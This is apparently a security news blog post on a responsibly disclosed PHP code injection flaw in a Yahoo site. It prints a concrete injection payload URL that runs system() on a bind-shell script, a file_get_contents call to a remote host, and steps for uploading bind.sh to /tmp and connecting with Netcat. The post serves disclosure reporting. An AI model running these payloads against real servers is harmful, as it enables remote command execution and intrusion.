PHP Code Injection Vulnerability in Yahoo Website - BestCyberNews: Online News Presenter in the present world

BestCyberNews: Online News Presenter in the present world

Start knowing

test banner

Breaking

PHP Code Injection Vulnerability in Yahoo Website

Ebrahim Hegazy, A Web application penetration tester, has discovered a critical remote PHP code injection vulnerability in the Yahoo website that could allowed hackers to inject and execute any php code on the Yahoo server.


A PHP Code Injection flaw allows an attacker to execute PHP code such as system or any other php function/code, it occurs when user  sends untrusted data to the target through values of the parameters that are reflected inside eval() function.

Ebrahim tried to go arround by using the function file_get_contents(“http://sec-down.com/poc.txt”) but this one dosen’t work because of the folder permissions, did you say do it in /tmp ?!



1- uploading “bind.sh” which is a bind connection script, into /tmp directory

2- Execute it to make a bind connection with the server

.e.g http://tw.user.mall.yahoo.com/rating/list?sid=${@print(system(“./tmp/bind.sh”))}

3- Receive the connection from the server on Netcat and now I will be free to run Commands

Actually he used Netcat, this is a Hacking tool it also could be detected by any simple AV/IDS on the system, this could corrupt the whole thing.

Prof of this concept

Yahoo immediately fixed the issue after getting the notification from the Ebrahim Hegazy. He is still waiting for the Bug bounty reward for the bug.


Author Venkatesh Yalagandula Follow us Google + and Facebook and Twitter

No comments:

Post a Comment